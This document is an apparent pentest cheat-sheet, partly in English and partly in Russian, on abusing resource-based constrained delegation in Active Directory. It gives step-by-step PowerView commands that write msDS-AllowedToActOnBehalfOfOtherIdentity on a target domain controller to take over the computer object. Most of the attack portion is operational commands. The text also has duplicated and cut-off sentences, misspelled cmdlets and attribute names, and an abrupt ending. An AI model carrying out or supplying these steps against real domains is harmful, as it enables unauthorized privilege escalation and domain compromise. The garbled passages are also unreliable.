Resource-based Constrained

If an account, having the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object (e.g. the GenericWrite ACE, see Abusing ACLs), is compromised, an attacker can use it populate that attribute, hence configuring that object for RBCD.

that attribute, hence configuring that object for RBCD.

Machine accounts can edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, hence allowing RBCD attacks on relayed machine accounts authentications.
For this attack to work, the attacker needs to populate the target attribute with the SID of an account that Kerberos can consider as a service. A service ticket will be asked for it. In short, the account mu

For this attack to work, the attacker needs to populate the target attribute with the SID of an account that Kerberos can consider as a service. A service ticket will be asked for it. In short, the account must be either (see Kerberos tickets for more information about the following):

• a user account having a ServicePrincipalName set

• an account with a trailing $ in the sAMAccountName (i.e. a computer accounts)

• any other account and conduct SPN-less RBCD with U2U (User-to-User) authentication

The common way to conduct these attacks is to create a computer account. This is usually possible thanks to a domain-level attribute called MachineAccountQuota that allows regular users to create up to 10 computer accounts.

Resource-based Constrained Delegation ACL-based Computer Object Takeover

Целевой компьютерный объект, который мы захватываем

$TargetComputer = "dc.here.local"

Поиск целей с включенной функцией S4U2Self

Get-DomainObject -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=16777216)' -Properties samaccountname,useraccountcontrol

Получить SID атакующего (УЗ с правами на цель)

$AttackerSID = Get-DomainUser userhere -Properties objectsid | Select -Expand objectsid

Проверить права GenericWrite на $TargetComputer

$ACE = Get-DomainObjectACL $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID} $ACE CovertFrom-SID $ACE.SecurityIdentifier

$ACE

CovertFrom-SID $ACE.SecurityIdentifier

Контролируемая нами УЗ, которой мы хотим предоставить S4U доступ к цели

$S4UIdentity = "domain\target"

Преобразовать идентификатор в идентификатор безопасности

$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $S4UIdentity).Translate([System.Security.Principal.SecurityIdentifier])).Value

Подставить идентификатор безопасности в исходный SDDL

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"

Получить двоичные байты для SDDL

$SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0)

Установить новый дескриптор безопасности для 'msds-lowedtoactonbehalfofotheridentity'

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

Проверить правильность добавления ACE

$RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity

$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0

$Descriptor.DiscretionaryAcl

ConvertFrom-SID $Descriptor.DiscretionaryAcl.SecurityIdentifier

На цели где включён S4U2Self